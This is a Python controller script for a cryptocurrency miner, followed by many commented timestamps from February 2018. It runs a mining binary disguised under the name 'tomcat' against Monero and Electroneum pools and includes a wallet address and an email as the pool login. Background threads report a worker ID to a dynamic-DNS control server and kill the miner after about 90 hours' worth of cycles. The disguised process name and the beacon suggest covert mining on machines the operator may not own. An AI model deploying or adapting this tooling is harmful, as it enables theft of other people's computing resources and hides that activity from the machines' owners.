import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:03.801180
#2018-02-17 17:29:04.391242
#2018-02-17 19:17:05.716841
#2018-02-17 21:07:06.475094
#2018-02-17 22:50:08.014670
#2018-02-18 00:35:03.973266
#2018-02-18 02:25:07.878291
#2018-02-18 04:12:07.069856
#2018-02-18 06:04:04.709452
#2018-02-18 07:53:03.689577
#2018-02-18 09:40:03.477003
#2018-02-18 11:26:06.660400
#2018-02-18 13:12:07.390315
#2018-02-18 15:02:07.014472
#2018-02-18 16:50:03.571447
#2018-02-18 18:38:05.708309
#2018-02-18 20:26:05.303679
#2018-02-18 22:12:05.920203
#2018-02-19 00:01:05.789847
#2018-02-19 01:46:07.899356
#2018-02-19 03:32:07.474700
#2018-02-19 05:17:06.767923
#2018-02-19 07:05:09.193688
#2018-02-19 08:54:06.508245
#2018-02-19 10:43:07.897889
#2018-02-19 12:31:06.168279
#2018-02-19 14:18:06.758851
#2018-02-19 16:08:08.448665
#2018-02-19 17:57:08.809771
#2018-02-19 19:43:09.004167
#2018-02-19 21:32:07.620050
#2018-02-19 23:18:08.412642
#2018-02-20 01:05:01.845492
#2018-02-20 02:55:04.631467
#2018-02-20 04:43:04.668896
#2018-02-20 06:27:04.978872
#2018-02-20 08:12:07.033030
#2018-02-20 09:59:07.066467
#2018-02-20 11:43:09.693803
#2018-02-20 13:31:09.354550
#2018-02-20 15:15:08.197238
#2018-02-20 16:59:08.214010
#2018-02-20 18:47:09.927439
#2018-02-20 20:37:07.364421
#2018-02-20 22:21:08.051138
#2018-02-21 00:03:07.479116
#2018-02-21 01:48:04.039925
#2018-02-21 03:37:05.513159
#2018-02-21 05:25:08.064978
#2018-02-21 07:13:01.904215
#2018-02-21 08:58:06.639868
#2018-02-21 10:46:07.386388
#2018-02-21 12:32:08.053390
#2018-02-21 14:20:04.212399
#2018-02-21 16:08:10.728507
#2018-02-21 18:00:03.371026
#2018-02-21 19:46:05.545230
#2018-02-21 21:34:02.984093
#2018-02-21 23:19:06.143123
#2018-02-22 01:09:02.361092
#2018-02-22 02:58:06.949083
#2018-02-22 04:44:04.615639
#2018-02-22 06:28:07.419158
#2018-02-22 08:15:08.987090
#2018-02-22 10:04:01.916722
#2018-02-22 11:49:01.956495
#2018-02-22 13:35:07.170979
#2018-02-22 15:23:10.854042
#2018-02-22 17:09:06.101143
#2018-02-22 18:56:08.379229
#2018-02-22 20:49:07.909423
#2018-02-22 22:36:08.305716
#2018-02-23 00:23:08.723129
#2018-02-23 03:29:04.193575
#2018-02-23 05:14:05.300826
#2018-02-23 06:59:06.737789
#2018-02-23 08:49:06.982111
#2018-02-23 11:06:02.271337
#2018-02-23 13:01:10.921276
#2018-02-23 14:46:01.355585
#2018-02-23 16:36:08.413137
#2018-02-23 18:23:04.535002
#2018-02-23 20:07:04.970294
#2018-02-23 21:54:07.811641
#2018-02-23 23:43:06.950693
#2018-02-24 01:34:07.825905
#2018-02-24 03:23:04.448188
#2018-02-24 05:08:05.902129
#2018-02-24 06:58:05.931323
#2018-02-24 08:49:04.737334
#2018-02-24 10:52:03.546186
#2018-02-24 12:40:06.908392
#2018-02-24 14:28:05.816976
#2018-02-24 16:16:04.310090
#2018-02-24 18:08:04.080258
#2018-02-24 19:54:07.515080
#2018-02-24 21:39:07.210482
#2018-02-25 01:50:09.591973
#2018-02-25 04:52:06.228284
#2018-02-25 08:14:01.532100